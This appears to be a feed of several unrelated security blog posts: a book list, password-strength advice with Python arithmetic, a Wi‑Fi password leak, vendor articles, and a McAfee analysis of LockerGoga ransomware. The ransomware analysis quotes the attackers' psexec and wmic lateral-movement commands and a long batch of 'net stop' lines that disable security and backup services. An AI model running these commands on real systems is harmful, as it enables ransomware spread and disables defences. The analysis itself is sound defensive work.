Worm by Mark Bowden traces the history of the Conficker worm, one of the first major threats against the Internet, and which put into perspective how important online security would be in the new technological world.

Spam Nation by Brian Krebs explores the world of spam, unmasking criminal groups responsible for flooding the email inboxes of tens of millions of users with scam offers, malware and ransomware.

Madalin Dogaru | Security Consultant at SentientChip

If you want to learn how to (ethically!) hack a computer, you’re going to need to know Python, and Black Hat Python by Justin Seitz teaches you the most important aspects.

Reversing: Secrets of Reverse Engineering by Eldad Eilam breaks down the processes required to reverse engineer software and computer internals.

Rtfm: Red Team Field Manual by Ben Clark contains all of the most important basic syntax in Windows and Linux command lines. Useful when Google doesn’t seem to be able to handle your search query.

Linux Shell Scripting Cookbook is a useful resource in learning how to use simple commands for complex tasks in the Linux shell.

Peter Kruse | Twitter | eCrime Specialist at CSIS Security

Countdown to Zero Day by Kim Zetter. By now, this is the third endorsement of this book, which highlights its quality.

Daniel Cid | Profile page | Founder/CTO of Sucuri, Inc

Stealing the Network: How to Own a Continent details how major hacks are accomplished from a technical point of view. A more interesting take on this book comes from reviewer Amar Pai:

This is basically a Tom Clancy novel, but with PHP exploits, nmap console logs, IDA debugger sessions, and other info-sec-porn in place of the usual war-nerdy stats about submarines, missile launchers, Apache gunships, etc.

David Harley | Twitter | Anti-malware researcher and author

Since ‘true’ computer viruses occupy only a tiny corner of the current malware threatscape, it may seem strange to refer back to a groundbreaking book on viruses from 1990, but I really have to mention Dr. Frederick B. Cohen’s book ‘A Short Course on Computer Viruses’. Not just because Cohen literally ‘wrote the book’ on viruses and is therefore a significant historical figure. Not just because of what it tells us about the threat as it was seen at that time, though as a fairly abstract overview it does have interest. (If you want exhaustive discussion of specific historical malware, I have a few suggestions below.) But because if you absorb his analyses of technical defenses, you will be in a position to make certain vendors uncomfortable by asking questions about their magic algorithms.

Wearing my security manager’s hat (well, I would, but I haven’t occupied that particular vocational niche for many years, so I don’t have one), I also found Cohen’s ‘Protection and Security on the Information Superhighway ’ a useful resource (especially as a source of useful citations), if less groundbreaking.

There are, of course, many books intended for the edification of security managers, not all of which are terribly good. It might be a bit naughty to mention a book of which I was lead author and technical editor, but I really do think that the ‘AVIEN Malware Defense Guide for the Enterprise ’ (Syngress), though it too suffers from obsolescent technical assumptions, is still worth a look in that it offers a (probably unique) selection of chapters contributed by enterprise security professionals, security vendors, and researchers.

Long before I ever met Stephen Cobb, now a friend and colleague at ESET, one of my go-to resources for management-oriented information was his book ‘ The NCSA Guide to PC and LAN Security ’ (McGraw-Hill). That book was actually based on an earlier book, ‘Cobb’s Guide to PC and LAN Security’ which is available for download from Stephen’s blog at https://scobbs.blogspot.co.uk/ and as he says himself, ‘A lot of what I wrote about privacy principles is still relevant.’

I don’t claim to have more than the basic knowledge of cryptology, but if I needed to dig a little bit deeper, my first port of call would still be Bruce Schneier’s ‘Applied Cryptography: Protocols, Algorithms and Source Code in C’ (Wiley), even though the 2nd edition goes back to 1996. However, ‘Cryptography Engineering: Design Principles and Practical Applications’ (Wiley: by Niels Ferguson, Schneier, and Tadayoshi Kohno) is much more recent, though I’m afraid I haven’t got around to reading it yet. For a more historical, less technical consideration, Simon Singh’s ‘The Code Book’ (Doubleday) is a pleasant enough read.

And since I mentioned historical malware, I should mention ‘The Art of Computer Virus Research and Defense ’ (Addison-Wesley), by the much-missed researcher Peter Szor. It came out in 2005, so it’s not, of course, up to date, but it contains a great deal of information about early malware and detection technology. There are, in fact, a few books that cover the history of viruses and anti-virus technology accurately and in detail, but they’re not generally available now. For instance, Robert Slade’s Guide to Computer Viruses (and I won’t mention the book Rob and I wrote together a little later.)

Conclusion

The listed books here cover almost every aspect of cybersecurity, across all levels of skill. From the highly technical to the easy, literary reads anyone can enjoy. Hopefully, one or more of these books will help you out in becoming hack proof.

What book would you add to the list? Submit your proposals in the comments below.


The post The best cyber security books out there, chosen by over 20 experts appeared first on Heimdal Security Blog.

Survey reveals just how bad the UK is at creating passwords

There are more than 171,000 words in the English language, and yet millions of us can’t look beyond the word that’s right in front of us when selecting a password.

Yes, the NCSC (National Cyber Security Centre)’s Cyber Security Survey found that 3.6 million Britons use ‘password’ as their password. Just as bad are the 23.2 million who use ‘123456’ and the 3.8 million who use ‘qwerty’.

Other common passwords include people’s names (‘ashley’, ‘michael’, ‘daniel’, ‘jessica’ and ‘charlie’ were the most used), football teams and, bizarrely, the pop punk act ‘blink-182’.

But rather than simply castigate the British public for their ineptitude when selecting login credentials, the NCSC provides some much-needed advice on how we can better secure our accounts.

How to make your passwords stronger

When creating passwords, many experts advise using a combination of letters, numbers and special characters (which might explain the interest in Blink-182). However, the NCSC suggests that we might be better off with a combination of three random words.

The reason for this is simple. Despite the requirement for a mix of characters, most systems only require that passwords be six characters long. This might seem to be more than enough – an alphabet of 26 letters, 10 numerals and 33 special characters gives you roughly 108 billion (69⁶) possible six-character passwords – but reality rarely plays out this way.

For example, the number ‘1’ appears far more often than any other digit, and the special character (for there is typically only one) is almost always ‘-‘. Most of us have therefore given crooks a decent shot at two characters in our passwords – and they’ll typically be the last two characters.

If you try to outsmart crooks by gorging yourself on special characters, using passwords like ‘a3g^%s’, you’ve only made life harder for yourself. The password is almost impossible to memorise, and criminal hackers are aware of common substitutions, factoring them in when trying to access accounts.

However, as the NCSC advises, you can make your password much stronger simply by making it longer. Each additional lower-case letter you use makes your password 26 times harder to crack, meaning a ten-character password that uses letters alone has about 141 trillion (26¹⁰) combinations.

To put it another way, How Secure Is My Password? predicts that the seemingly complex phrase ‘a3g^%s’ could be cracked in 400 milliseconds, whereas an eleven-letter combination of three words, like ‘hardtocrack’, would take about a day.

That’s a decent result, but with the number of crooks in the wild churning through passwords, you can do better. Make your password a little longer, like ‘typingmypassword’, and you have a phrase that could take 35,000 years to crack – and that’s with the concession of making your password a literal description of itself.

Anyone capable of conjuring up three genuinely random words could create a password that would take trillions of years to crack without having to compromise on memorability.
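The arithmetic behind those estimates is worth making explicit, because it also shows the one caveat in the “three words” advice: the words must be chosen at random, not as a phrase. The Python below is an added example written for this post, not code from the NCSC or from the article. It computes the size of the search space and the bits of entropy for each policy discussed above, and the worst-case time to exhaust it at an assumed offline guessing rate (10 billion guesses per second is an assumption, not a figure from the survey). The word-list sizes (the article’s 171,000 English words and a 7,776-word random-word list) are likewise assumptions for illustration.

```python
"""Search-space arithmetic behind the NCSC "three random words" advice.

Added example, not from the NCSC survey or the original article. Guess rate
and word-list sizes are assumptions chosen for illustration.
"""
import math

LOWERCASE = 26
DIGITS = 10
SPECIALS = 33                          # the article's count of special characters
ENGLISH_WORDS = 171_000                # the article's count of English words
DICEWARE_WORDS = 7_776                 # size of a common random-word list (assumption)
GUESSES_PER_SECOND = 10_000_000_000    # assumed offline cracking rate, 1e10/s
SECONDS_PER_YEAR = 365 * 24 * 3600


def search_space(alphabet_size, length):
    """Number of distinct strings of `length` symbols over an alphabet of `alphabet_size`."""
    return alphabet_size ** length


def passphrase_space(dictionary_size, word_count):
    """Number of passphrases when every word is drawn uniformly from the dictionary.

    This only holds for genuinely random words; a meaningful phrase such as
    'typingmypassword' is one entry in a phrase list, not one of 26**16 strings.
    """
    return dictionary_size ** word_count


def entropy_bits(space):
    """Strength in bits: log2 of the number of equally likely candidates."""
    return math.log2(space)


def years_to_exhaust(space, guesses_per_second=GUESSES_PER_SECOND):
    """Worst-case time to try every candidate at a constant guess rate."""
    return space / guesses_per_second / SECONDS_PER_YEAR


def predictable_tail_space(letters, digit_choices=1, special_choices=1):
    """The six-character 'letters + a digit + a special' policy as an attacker
    models it: the digit is '1' and the special is '-' in the last two positions,
    so only the letters are really unknown."""
    return search_space(LOWERCASE, letters) * digit_choices * special_choices


def compare_policies():
    """Return (label, candidates, bits, years) for each policy in the article."""
    rows = [
        ("6 chars, full 69-symbol mix, nominal", search_space(LOWERCASE + DIGITS + SPECIALS, 6)),
        ("6 chars, 4 letters + '1' + '-' (attacker's model)", predictable_tail_space(4)),
        ("10 lower-case letters", search_space(LOWERCASE, 10)),
        ("16 lower-case letters", search_space(LOWERCASE, 16)),
        ("3 random words from a 7,776-word list", passphrase_space(DICEWARE_WORDS, 3)),
        ("3 random words from 171,000 English words", passphrase_space(ENGLISH_WORDS, 3)),
    ]
    return [(label, n, round(entropy_bits(n), 1), years_to_exhaust(n)) for label, n in rows]


if __name__ == "__main__":
    for label, n, bits, years in compare_policies():
        print(f"{label:52} {n:>22,d}  {bits:5.1f} bits  {years:12.3g} years")
```

Two things fall out of the table that the prose only hints at. First, the “complex” six-character password collapses from 108 billion candidates to under half a million once the attacker assumes the usual digit and special character, which is why the tool cracks it in milliseconds. Second, three words drawn at random from a 7,776-word list give about 38.8 bits, less than nine random lower-case letters, so the passphrase only reaches the “trillions of years” range when the words come from a large dictionary and are genuinely random rather than a phrase the user finds natural.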


The post Survey reveals just how bad the UK is at creating passwords appeared first on IT Governance Blog.

Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed

Logging onto a free Wi-Fi network can be tempting, especially when you’re out running errands or waiting to catch a flight at the airport. But this could have serious cybersecurity consequences. One popular Android app, which allowed anyone to search for nearby Wi-Fi networks, recently left its database of more than 2 million network passwords exposed and unprotected.

How exactly were these passwords exposed? The app, which had been downloaded by millions of users, allowed anyone to search for Wi-Fi networks in their area. It also let users upload Wi-Fi network passwords from their devices to its database for others to use. When that database was left exposed and unprotected, anyone could access and download its contents. Each record contained the Wi-Fi network name, its precise geolocation, its basic service set identifier (BSSID), and the network password in plaintext. Because the app didn’t require users to obtain the network owner’s permission before uploading, many of the networks in the database were private home and business networks. With the password and location of such a network in hand, an attacker within range can join it, and from inside the network, if the router’s administration interface is poorly protected, modify its settings to point unsuspecting users to malicious websites. A threat actor on the network could also read any unencrypted traffic crossing it, allowing them to steal passwords and private data.

Thankfully, the web host was able to take down the database containing the Wi-Fi passwords within a day of being notified. But it’s important for users to be aware of the cybersecurity implications that free or public Wi-Fi presents. Check out the following tips to help protect your data:

  • Change your Wi-Fi password. If you think your password may have been affected by this exposure, err on the side of caution and reset it. Be sure to make your new password complex and unique.
  • Keep your network password private. Wi-Fi networks could be susceptible to a number of threats if their passwords are left in the wrong hands. Only share your passwords with family, friends, and those you trust, and never upload your password to a public database for strangers to use.
  • Safeguard your online privacy. Use a security solution like McAfee Safe Connect to encrypt your online activity, protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed appeared first on McAfee Blogs.

What is Rubber Stamping and Why is it a Serious Cybersecurity Concern?

Although the red “APPROVED” ink stamp is rarely used these days, the practice of bulk approving (or denying) requests without investing the necessary time or conducting the necessary research is as popular as ever. Though this can occur in any department across any organization, rubber-stamping is particularly problematic when it comes to reviewing access to IT resources. Bulk approvals of requests for access to the various systems and assets quickly become a security concern. In order to avoid giving in to the temptation to rush these approvals without adequate review, organizations must first understand the damage that can result from rubber-stamping, why it happens, and how it can be prevented.

The Dangers of Too Much Access

User access and how it is managed greatly impacts the risk of insider threats, which have become all too common. In fact, according to a survey completed by Cybersecurity Insiders, over 50 percent of organizations surveyed experienced an insider attack in the last twelve months. Approving everyone for any access they apply for, or not adequately reviewing user access periodically, provides ample opportunity for both malicious and accidental insider threats.

Dissatisfied employees pose a unique risk given their knowledge of the organization and their sometimes nefarious motivations. If they know the approval process is not being monitored or access is not being periodically reviewed, they could easily submit a request to access sensitive data which they could then misuse. It could take months before their activity was discovered.

Accidental or negligent misuse of access is also considered an insider threat. Employees may not understand exactly what access they need and end up asking for and being approved for more privilege than they require; they may even request access to the wrong system or asset entirely. The result is often errors in how the access is used. Failing to govern exactly who is asking for what and why they need it creates an environment primed for increased errors.

Additionally, limiting user access is a key component of many regulations like GDPR, Sarbanes Oxley (SOX), and HIPAA, whether it be through the application of proper approval processes or the periodic review of access. Frequent rubber stamping could result in being out of compliance, opening your organization up to potential fines, or worse.

Certification Fatigue and Information Underload: Why Rubber Stamping Occurs

Approving entitlements without a second glance is dangerous. So why is it so common?

Firstly, those in charge of approving access requests or periodically reviewing large lists of user entitlements are often inundated with them, causing certification fatigue. In order to get through the list and get back to work, they simply grant them all. Essentially, they may be busy enough that the only type of access review or approval that will happen in a timely manner is a careless one.

Secondly, access reviews especially are often presented in a confusing format, or an unreadable one. Spreadsheets with this information are hard to read and may not provide enough context to determine if the existing access is actually needed. There are several considerations which may not be listed in a spreadsheet, like how commonly the type of access requested is granted for a given job role, or if it is only needed for a limited time or purpose. With potentially hundreds of requests in need of action, it’s impractical to expect a reviewer or approver to take the time to research each request.

Ultimately, these kinds of reviews require a human eye and a clear understanding of the context in which the access is requested or has been granted. A balance must be struck between efficiency, accuracy, and security. As long as this process is manual, without improvements in the manner in which the data are presented to the reviewer, accuracy is a difficult goal to achieve.

Providing Access Accurately and Safely with a Certification Solution

Core Certify provides the context approvers need to make an informed decision in a visual format that allows users to clearly and quickly see common user entitlements and rapidly identify outliers. Core Certify works as a standalone solution, or as part of a suite that enables an organization to also take a graphic approach to periodic or ad-hoc access reviews.

In addition, the same visual, context-driven approach is available for role creation. To see it for yourself, as well as the rest of the Visual Identity Suite, get a personalized demo today.


How Veracode Security Program Managers Benefit Your AppSec Program

The application security space is a complicated environment with a vast landscape of roles, development methodologies, and tech stacks. Developers, security leads, risk analysts, Scrum masters, vendor managers, operations teams, and system architects are all on the scene, just to name a few. 

If we compare the land of AppSec to the agriculture industry, your Veracode Security Program Managers are the farmers, and secure software is our crop. Our calloused hands are dirty with application security, and we thrive on lending our green thumb to your program, so you can achieve your security and organizational goals. 

This summer marks my two-year tenure as a Veracode Security Program Manager. I support about 30 different customer organizations in the Eastern US, and I specialize in scaling new application security initiatives into best-in-class programs. We are all about delivering value here at Veracode, and I wanted to shed some light on how Security Program Managers can help guide you on your AppSec journey.

We’re Here For You

Whether you need us for one hour per month, or 16 hours a week, we’ve got your back. We are a part of the larger Services team within Veracode, and we’re proud of it. Some of us support 250 customers, some of us support three customers, and most of us are somewhere in between. Regardless of your level of service, you will always be partnered with a Veracode Security Program Manager to help you succeed.

As Security Program Managers, most of our time is spent communicating with our customers. Although Veracode may be one tool in your program, we understand how the solution fits into your larger security landscape, and we are experts in the space. Internally, we share what works (and what doesn’t work) with each other to fine tune our best-practice methods.   

We’re an Extension of Your Team

Although we are process and workflow wizards, there may be times when we don’t have the answer to your questions right away. However, we usually know who will. Veracode Security Program Managers act on your behalf as corporate liaisons, and we’re not shy about asking for help when we don’t know something.           

Throughout the life of your program, you’ll work with us to identify organizational challenges, program goals, and success metrics. The combination of these tools and our programmatic approach holds you and your team accountable. Need help integrating Veracode results into your SIEM or want to discuss the best way to manage your CI/CD pipeline? We know some people.   

We Help You Achieve Security as a Competitive Advantage

Kick-off calls, platform demos, status calls, and program review meetings equip us with visibility into the health of your program. These touchpoints, combined with a blend of analytics, strategic expertise, and a shared passion for efficiency, are the base to our secret sauce for your success. We’re obsessed with helping you lessen your risk of failure and saving you money, all while enabling your organization to become more secure as a competitive advantage.

Your Veracode Security Program Manager will have insight into our newest programs and resources to help you achieve your security goals. Lean on us to help you discover a list of your applications that already qualify for the free Veracode Verified program. We’ll also keep you up to speed on our latest and greatest free webinars, which are released on a monthly basis. Becoming familiar with your program enables us to send you content tailored to your initiatives. Let us dig through the noise and send you the right resources.

We Evolve With You

The pressure to produce more code more quickly will only compound over time. Veracode Security Program Managers are here to ensure your great software is also secure, all while helping you move fast. While speed is top of mind for us, accuracy is built into our DNA. As a team, we are passionate about staying ahead of emerging market changes and the latest technology trends.   

We know how to leverage our enhanced Veracode Analytics tool in the platform to gain immediate insight into your program to identify potential risk, areas to improve, and strategic next steps. We can also help you learn how to create and share custom reports that are meaningful to both you and your business. 

Your organization is working hard to create software that’s changing the world; lean on a Veracode Security Program Manager as a trusted advisor to help secure it. Together, we can plant the seeds for bold innovations and pioneer new discoveries.     

Check out our website to learn more about our Services organization.

Cyber Ranges: Extending the Skills of Tool Experts

Working with rapidly growing products like our CMD+CTRL Cyber Range is fun for a variety of reasons, particularly because seeing people smile while learning is a rare occurrence. For much of the Security Innovation team though, the best experience is growing a technology from an interesting idea to a rapidly maturing product. Even better, the journey allows for many “Aha!” moments in the form of feedback and ideas from our customers.

LockerGoga Ransomware Family Used in Targeted Attacks

Initial discovery

Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new features to the tried and true formula of encrypting victims’ files and asking for payment to decrypt them, has gained notoriety for the targets it has affected.

In this blog, we will look at the findings of the McAfee ATR team following analysis of several different samples. We will describe how this new ransomware works and detail how enterprises can protect themselves from this threat.

Technical analysis

LockerGoga is a ransomware that exhibits some interesting behaviors we want to highlight. Based on our research, it has a few functions and capabilities that are rare among other ransomware families with similar objectives and/or targeted sectors in their campaigns.

In order to uncover its capabilities, we analyzed all the samples we found, discovering similarities between them, as well as how the development lifecycle adds or modifies different features in the code, evolving the ransomware into a more professional tool for the group behind it.

One of the main differences between LockerGoga and other ransomware families is the ability to spawn different processes in order to accelerate the file encryption in the system:

Like other types of malware, LockerGoga will use all the available CPU resources in the system, as we discovered on our machines:

Most of the LockerGoga samples work the same way but we observed how they added and removed certain types of functionality during their development lifecycle.

The ransomware needs to be executed from a privileged account.

LockerGoga works in a master/slave configuration. The malware begins its infection on an endpoint by installing a copy of itself in the %TEMP% folder.

After being copied, it will start a new process with the -m parameter.

The master process runs with the -m parameter and is responsible for creating the list of files to encrypt and spawning the slaves.

The slave processes will be executed with a different set of parameters as shown below. Each slave process will encrypt only a small number of files, to avoid heuristic detections available in endpoint security products. The list of files to encrypt is taken from the master process via IPC, an interface used to share data between applications in Microsoft Windows. The communication is done through IPC using a mapped section named SM-<name of binary>.

Here is the IPC technique used by LockerGoga:

  • The master process (run as <LockerGogaBinary> -m) creates a named section on the system for IPC.
  • The section is named “SM-tgytutrc”.
  • The master ransomware process posts the filepath of the file to be encrypted to the named section “SM-tgytutrc”.
  • This section is used by the slave processes to pick up the filepath and encrypt the target file.

Sandbox replication of master process screenshot below showing:

  • Creation of the named section.
  • Subsequent creation of slave processes to encrypt target files on the endpoint.

Sandbox replication of slave process (encryption process) below showing:

  • Obtaining access to the section created by the master process.
  • Reading and encryption of a target file found based on the filepath specified in the named section.

The ransomware creates multiple slave processes on the endpoint to encrypt files. Some analysts believe this is the case simply because it speeds up the encryption process, but we are not convinced as the same outcome can be achieved via a multi-threaded approach in the ransomware process instead of a multi-process approach.

Instead, we suspect this approach is adopted for the following reasons:

  • Footprint: If every encryption process encrypts only a small number of files on the endpoint and then terminates, the overall footprint of the attack on the system decreases, since it may be difficult to correlate multiple encryption processes with the same threat.
  • Sandbox bypass: Some sandbox-based detection systems monitor the number of files written on the system and may correlate it with the file extensions being written. For example, if a process reads, say, 200 files on the sandbox but only creates files with one specific extension (typical of ransomware; “.locked” in the case of LockerGoga), this can be considered anomalous behavior. LockerGoga may be able to bypass such detection techniques.
  • File I/O based detection bypass: A multi-process approach keeps the amount of I/O (file/disk I/O etc.) for each encryption process within a certain limit, thus bypassing detection techniques that monitor for exorbitant I/O.
  • Reliability: Even if one encryption process is manually terminated by an end user, as long as the master ransomware process is running the files will continue to be encrypted by new slave processes. If the ransomware did not use the multi-process approach, terminating the ransomware process would stop the encryption on the endpoint.
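To make the footprint and sandbox-bypass points concrete from the defender's side, here is an added Python example (not code from the McAfee analysis) that aggregates file-creation telemetry per process tree instead of per process. A per-process threshold never fires when each slave writes only a handful of files, while the same threshold applied to the master's subtree does. The process ids, image name and file paths are constructed sample telemetry; only the `.locked` extension and the master's `-m` parameter come from the analysis above.

```python
"""
Per-process-tree aggregation of file-creation events.

Constructed sample telemetry (not real data): a hypothetical master process
(pid 100, started with "-m" as described above) spawns six short-lived
children that each create only three ".locked" files before exiting.
"""
from collections import defaultdict

SUSPICIOUS_EXT = ".locked"  # extension LockerGoga appends to encrypted files

SAMPLE_EVENTS = (
    [
        {"type": "process", "pid": 4242, "ppid": 1, "image": "cmd.exe"},
        {"type": "process", "pid": 100, "ppid": 4242, "image": "taskhost.exe"},  # master (-m)
    ]
    + [{"type": "process", "pid": 100 + i, "ppid": 100, "image": "taskhost.exe"}
       for i in range(1, 7)]
    + [{"type": "file", "pid": 100 + i,
        "path": rf"C:\Users\victim\Documents\report{i}_{j}.docx{SUSPICIOUS_EXT}"}
       for i in range(1, 7) for j in range(3)]
    + [{"type": "file", "pid": 4242, "path": r"C:\Users\victim\notes.txt"}]  # benign write
)


def index_processes(events):
    """Build pid -> ppid and pid -> image maps from process-creation events."""
    parents, images = {}, {}
    for ev in events:
        if ev["type"] == "process":
            parents[ev["pid"]] = ev["ppid"]
            images[ev["pid"]] = ev["image"]
    return parents, images


def ancestors(pid, parents):
    """Yield pid and every known ancestor, nearest first; stops at an
    unknown root and guards against pid-reuse cycles."""
    seen = set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        yield pid
        pid = parents[pid]


def count_writes(events, ext=SUSPICIOUS_EXT):
    """Count suspicious-extension file creations per process (own) and per
    subtree (credited to the writer and all of its ancestors)."""
    parents, _ = index_processes(events)
    own, subtree = defaultdict(int), defaultdict(int)
    for ev in events:
        if ev["type"] != "file" or not ev["path"].lower().endswith(ext):
            continue
        own[ev["pid"]] += 1
        for anc in ancestors(ev["pid"], parents):
            subtree[anc] += 1
    return own, subtree


def per_process_alerts(events, threshold=10, ext=SUSPICIOUS_EXT):
    """Naive rule: a single process crossing the threshold on its own."""
    own, _ = count_writes(events, ext)
    return sorted(pid for pid, n in own.items() if n >= threshold)


def process_tree_alerts(events, threshold=10, ext=SUSPICIOUS_EXT):
    """Tree rule: the lowest ancestors whose whole subtree crosses the
    threshold while no single child does, i.e. the likely orchestrator."""
    parents, _ = index_processes(events)
    _, subtree = count_writes(events, ext)
    flagged = {pid for pid, n in subtree.items() if n >= threshold}
    children = defaultdict(set)
    for pid, ppid in parents.items():
        children[ppid].add(pid)
    return sorted(pid for pid in flagged if not (children[pid] & flagged))


if __name__ == "__main__":
    print("per-process alerts:", per_process_alerts(SAMPLE_EVENTS))   # []
    print("process-tree alerts:", process_tree_alerts(SAMPLE_EVENTS))  # [100]
```

The tree rule reports pid 100 rather than its parent cmd.exe because the parent is only flagged through that one child; in real EDR data the same walk also survives the slaves exiting, since the counts are keyed on pids recorded at creation time, not on processes still alive.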

Username Administrator:

Username Tinba:

The author implemented a logging function that is enabled by running the sample with the “-l” parameter; it stores all results in a file called ‘log.txt’ in the root of the C: drive:

During execution we enabled the log function and watched the ransomware encrypt the system, causing high CPU usage and opening the ransom note during the process. This is what an infected system looks like:

Because we executed the sample with the log function enabled, we could read this file to check the status of the encryption. This is most likely a debug function used by the developer.

With the help of the log function, we could establish the order in which LockerGoga encrypts the system:

  • Log file creation in the C: drive
  • Folder and file enumeration
  • File encryption & ransom note creation in the desktop folder.

One interesting thing to mention is that, before encrypting any other file on the system, the malware first searches for files in the Recycle Bin folder. We are not certain why it takes this unusual step, though it could be because many people do not empty their recycle bins and the ransomware is looking to encrypt even those files that may no longer be required:

LockerGoga will then enumerate all the folders and files on the system to start the encryption process. This enumeration is done in parallel, so the process is not expected to take much time.

After the enumeration the ransomware will create the ransom note for the victim:

The ransom note was created in parallel with the encrypted files, and it is hardcoded inside the sample:

Like other ransomware families, LockerGoga will create the ransom note file to ask the user to pay to recover their encrypted files. We highly recommend not paying under any circumstance so as not to continue funding an underground business model. In case of a ransomware infection, please check https://www.nomoreransom.org

Below is an example of the ransom note content on an infected machine:

Greetings!

There was a significant flaw in the security system of your company.

You should be thankful that the flaw was exploited by serious people and not some rookies.

They would have damaged all of your data by mistake or for fun.

Your files are encrypted with the strongest military algorithms RSA4096 and AES-256.

Without our special decoder it is impossible to restore the data.

Attempts to restore your data with third party software as Photorec, RannohDecryptor etc. will lead to irreversible destruction of your data.

To confirm our honest intentions.

Send us 2-3 different random files and you will get them decrypted.

It can be from different computers on your network to be sure that our decoder decrypts everything.

Sample files we unlock for free (files should not be related to any kind of backups).

We exclusively have decryption software for your situation

DO NOT RESET OR SHUTDOWN – files may be damaged.

DO NOT RENAME the encrypted files.

DO NOT MOVE the encrypted files.

This may lead to the impossibility of recovery of the certain files.

The payment has to be made in Bitcoins.

The final price depends on how fast you contact us.

As soon as we receive the payment you will get the decryption tool and instructions on how to improve your systems security

To get information on the price of the decoder contact us at:

In parallel with the ransom note creation, the files will start to be encrypted by LockerGoga, with the .locked extension appended to every file. This extension has been broadly used by other ransomware families in the past:

LockerGoga has embedded in the code the file extensions that it will encrypt. Below is an example:

The sample has also configured some locations and files that will be skipped in the encryption process so as not to prevent the operating system from running.

All the files encrypted by this ransomware will have a specific FileMarker inside:

Note: The FileMarker identifies the ransomware family and the most likely version; in this case it is 1440.

During the investigation we identified the following versions:

  • 1200
  • 1510
  • 1440
  • 1320

Based on the binary compile time and the extracted versions, we observed that the actors were creating different versions of LockerGoga for different targets/campaigns.

After encrypting, LockerGoga executes ‘cipher.exe’ to wipe the free space on the disk and prevent file recovery on the infected system. When files are deleted, their contents often remain in the free space of the hard disk and can theoretically be recovered.

Samples digitally signed:

During our triage phase we found that some of the LockerGoga samples are digitally signed. ATR has observed that recent ransomware used in smaller-scale, more focused campaigns is being released digitally signed, in this case with certificates issued to:

  • MIKL LIMITED
  • ALISA LTD
  • KITTY’S LTD

Digitally signing the malware could help the attackers to bypass some of the security protections in the system.

As part of the infection process, LockerGoga will create a static mutex value in the system, always following the same format:

MX-[a-z]\w+

Examples of mutex found:

MX-imtvknqq

MX-tgytutrc

MX-zzbdrimp

Interesting strings found

In our analysis we extracted more strings from the LockerGoga samples, with interesting references to:

  • LockerGoga
  • crypto-locker
  • goga

E:\\crypto-locker\\cryptopp\\src\\crc_simd.cpp

E:\\crypto-locker\\cryptopp\\src\\rijndael_simd.cpp

E:\\crypto-locker\\cryptopp\\src\\sha_simd.cpp

E:\\crypto-locker\\cryptopp\\src\\sse_simd.cpp

E:\\goga\\cryptopp\\src\\crc_simd.cpp

E:\\goga\\cryptopp\\src\\rijndael_simd.cpp

E:\\goga\\cryptopp\\src\\sha_simd.cpp

E:\\goga\\cryptopp\\src\\sse_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\crc_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\rijndael_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\sha_simd.cpp

X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\sse_simd.cpp

The malware developers usually forget to remove those strings in their samples and we can use them to identify new families or frameworks used in their development.

Spreading methods:

The malware is known to spread across the local network through remote file copy. To do that, a set of .bat files is copied to the remote machine's TEMP folder with a simple copy command:

  • copy xax.bat \\123.123.123.123\c$\windows\temp

The malware will copy itself and the tool PSEXEC.EXE to the same location. Once all the files are copied, the malware will run the .BAT file using the following command:

  • start psexec.exe \\123.123.123.123 -u domain\user -p "pass" -d -h -r mstdc -s accepteula -nobanner c:\windows\temp\xax.bat

Each of these .BAT files contains lines to execute the malware on remote machines, using the following command:

  • start wmic /node:"123.123.123.123" /user:"domain\user" /password:"pass" process call create "cmd /c c:\windows\temp\kill.bat"

The batch file above attempts to kill several AV products and disable security tools. At the end of the script, the malware copy on the remote machine is executed from c:\windows\temp\taskhost.exe.

Because these batch files are present and the malware binary makes no direct reference to them, we believe the spreading mechanism is executed manually by an attacker or via an unknown binary. The paths, usernames and passwords are hardcoded in the scripts, which indicates that the attacker had prior knowledge of the environment.

The following is a list of the processes and services disabled by the malware. One batch file found on infected systems where LockerGoga was executed stops services and processes related to critical system services and security software:

net stop BackupExecAgentAccelerator /y
net stop McAfeeEngineService /y
net stop BackupExecAgentBrowser /y
net stop McAfeeFramework /y
net stop BackupExecDeviceMediaService /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop BackupExecJobEngine /y
net stop McTaskManager /y
net stop BackupExecManagementService /y
net stop mfemms /y
net stop BackupExecRPCService /y
net stop mfevtp /y
net stop BackupExecVSSProvider /y
net stop MMS /y
net stop bedbg /y
net stop mozyprobackup /y
net stop DCAgent /y
net stop MsDtsServer /y
net stop EPSecurityService /y
net stop MsDtsServer100 /y
net stop EPUpdateService /y
net stop MsDtsServer110 /y
net stop EraserSvc11710 /y
net stop MSExchangeES /y
net stop EsgShKernel /y
net stop MSExchangeIS /y
net stop FA_Scheduler /y
net stop MSExchangeMGMT /y
net stop IISAdmin /y
net stop MSExchangeMTA /y
net stop IMAP4Svc /y
net stop MSExchangeSA /y
net stop macmnsvc /y
net stop MSExchangeSRS /y
net stop masvc /y
net stop MSOLAP$SQL_2008 /y
net stop MBAMService /y
net stop MSOLAP$SYSTEM_BGC /y
net stop MBEndpointAgent /y
net stop MSOLAP$TPS /y
net stop McShield /y
net stop MSSQLFDLauncher$TPS /y
net stop MSOLAP$TPSAMA /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop MSSQL$BKUPEXEC /y
net stop MSSQLSERVER /y
net stop MSSQL$ECWDB2 /y
net stop MSSQLServerADHelper100 /y
net stop MSSQL$PRACTICEMGT /y
net stop MSSQLServerOLAPService /y
net stop MSSQL$PRACTTICEBGC /y
net stop MySQL57 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop ntrtscan /y
net stop MSSQL$SBSMONITORING /y
net stop OracleClientCache80 /y
net stop MSSQL$SHAREPOINT /y
net stop PDVFSService /y
net stop MSSQL$SQL_2008 /y
net stop POP3Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop ReportServer /y
net stop MSSQL$TPS /y
net stop ReportServer$SQL_2008 /y
net stop MSSQL$TPSAMA /y
